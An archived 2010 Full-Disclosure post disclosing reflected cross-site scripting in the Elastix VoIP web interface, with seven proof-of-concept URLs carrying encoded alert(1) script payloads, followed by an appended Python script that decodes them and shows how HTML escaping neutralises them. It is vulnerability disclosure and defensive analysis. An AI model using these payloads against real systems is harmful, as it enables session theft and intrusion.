lists.openwall.net: Open Source and information security mailing list archives
Date: Mon, 1 Nov 2010 03:16:10 +1100
From: dave b <db.pub.mail@...il.com>
To: full-disclosure <full-disclosure@...ts.grok.org.uk>
Subject: Fwd: xss in elastix

Oh look, I think bugtraq hates me .... more lame xss in yet another voip
management user interface for asterisk...

---------- Forwarded message ----------
From: dave b <db.pub.mail@...il.com>
Date: 29 October 2010 03:36
Subject: xss in elastix
To: bugtraq@...urityfocus.com

xss in elastix (http://www.elastix.org/):

1. https://10.0.20.226/index.php?menu=packages&nombre_paquete=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E&submitInstalado=installed&submit_nombre=Search

2. https://10.0.20.226/?menu=pbxconfig&display=recordings&Submit=Go&display=recordings&usersnum=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E

3. https://10.0.20.226/index.php?menu=cdrreport&date_end=28%20Oct%202010&date_start=28%20Oct%202010&field_name=dst&field_pattern=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&filter=Filter&status=ALL

4. https://10.0.20.226/index.php?menu=asterisk_log&filter=2010-10-28&offset=0&busqueda=&ultima_busqueda=&ultimo_offset=&&busqueda=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E&filter=2010-10-28&offset=0&show=Show&ultima_busqueda=&ultimo_offset=

5. https://10.0.20.226/index.php?menu=summary_by_extension&option_fil=&value_fil=&date_from=28&date_from=28%20Oct%202010&date_to=28%20Oct%202010&option_fil=Ext&show=Show&value_fil=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E

6. https://10.0.20.226/index.php?menu=grouplist&action=view&id=1%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E

7. https://10.0.20.226/index.php?menu=group_permission&filter_group=1&filter_resource=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
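The seven URLs above all carry the same kind of payload, percent-encoded, in one query parameter each. The script below is an added example (not part of dave b's post and not Elastix code): it decodes each advisory URL, reports which parameter carries the <script> tag and under which menu, and then contrasts an unescaped reflection of that value with one passed through html.escape. The input template is hypothetical; the page does not show the real Elastix markup, but the `"/>` prefix on every payload indicates the value is reflected inside a quoted attribute, and the template assumes that.

```python
"""Added example, not code from the original post or from Elastix: pull the
reflected payload out of each advisory URL and contrast an unescaped
attribute reflection with an HTML-escaped one."""
import html
from urllib.parse import urlsplit, unquote

# The seven URLs quoted in the post, copied verbatim.
ADVISORY_URLS = [
    "https://10.0.20.226/index.php?menu=packages&nombre_paquete=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E&submitInstalado=installed&submit_nombre=Search",
    "https://10.0.20.226/?menu=pbxconfig&display=recordings&Submit=Go&display=recordings&usersnum=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E",
    "https://10.0.20.226/index.php?menu=cdrreport&date_end=28%20Oct%202010&date_start=28%20Oct%202010&field_name=dst&field_pattern=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&filter=Filter&status=ALL",
    "https://10.0.20.226/index.php?menu=asterisk_log&filter=2010-10-28&offset=0&busqueda=&ultima_busqueda=&ultimo_offset=&&busqueda=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E&filter=2010-10-28&offset=0&show=Show&ultima_busqueda=&ultimo_offset=",
    "https://10.0.20.226/index.php?menu=summary_by_extension&option_fil=&value_fil=&date_from=28&date_from=28%20Oct%202010&date_to=28%20Oct%202010&option_fil=Ext&show=Show&value_fil=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E",
    "https://10.0.20.226/index.php?menu=grouplist&action=view&id=1%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E",
    "https://10.0.20.226/index.php?menu=group_permission&filter_group=1&filter_resource=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E",
]


def parse_query(url):
    """Split the query string on '&' and percent-decode each name/value pair.

    Done by hand rather than with urllib's parse_qsl so that the ';' inside
    'alert(1);' is never treated as a pair separator (older Pythons do that).
    """
    pairs = []
    for piece in urlsplit(url).query.split("&"):
        if not piece:          # the fourth URL contains a stray '&&'
            continue
        name, _, value = piece.partition("=")
        pairs.append((unquote(name), unquote(value)))
    return pairs


def injected_params(url):
    """Names and decoded values of every parameter carrying a <script> tag."""
    return [(n, v) for n, v in parse_query(url) if "<script" in v.lower()]


def summarize(urls):
    """One (menu, parameter, decoded payload) row per injected parameter."""
    rows = []
    for url in urls:
        params = parse_query(url)
        menu = next((v for n, v in params if n == "menu"), None)
        for name, payload in injected_params(url):
            rows.append((menu, name, payload))
    return rows


# Hypothetical template (the real Elastix markup is not on the page): the
# parameter is assumed to be echoed into a double-quoted attribute value.
TEMPLATE = '<input type="text" name="search" value="%s" />'


def render_unsafe(value):
    """What an unescaped echo of the parameter produces: the leading '"/>'
    closes the input tag and the <script> element that follows is live."""
    return TEMPLATE % value


def render_safe(value):
    """Same template with html.escape(quote=True): '"', '<' and '>' become
    entities, so the attribute cannot be closed and no tag is formed."""
    return TEMPLATE % html.escape(value, quote=True)


def script_tag_present(markup):
    return "<script" in markup.lower()


if __name__ == "__main__":
    for menu, name, payload in summarize(ADVISORY_URLS):
        print("menu=%-22s param=%-16s payload=%s" % (menu, name, payload))
    sample = summarize(ADVISORY_URLS)[0][2]
    print("unsafe:", render_unsafe(sample))
    print("safe:  ", render_safe(sample))
```

The same decode-and-report step is what you would run before retesting against a patched build: if a parameter from this list still comes back in the page with `<script` intact rather than `&lt;script`, the fix for that menu is incomplete.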